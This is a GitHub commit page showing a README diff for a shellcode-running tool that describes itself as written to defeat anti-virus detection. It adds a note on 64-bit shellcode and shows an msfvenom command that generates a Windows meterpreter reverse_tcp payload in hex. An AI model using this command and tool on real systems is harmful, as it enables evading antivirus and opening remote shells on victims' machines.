We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 9b0b381 commit 4039cebCopy full SHA for 4039ceb
README.md
@@ -6,6 +6,10 @@ written to defeat anti-virus detection.
6
7
Usage
8
=====
9
+
10
+Keep in mind that only 64bit shellcode will run in a 64bit process. This can't
11
+autodetect your shellcode architecture.
12
13
Use msfvenom or metasploit to generate a bit of shellcode as hex format:
14
```
15
$ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444
0 commit comments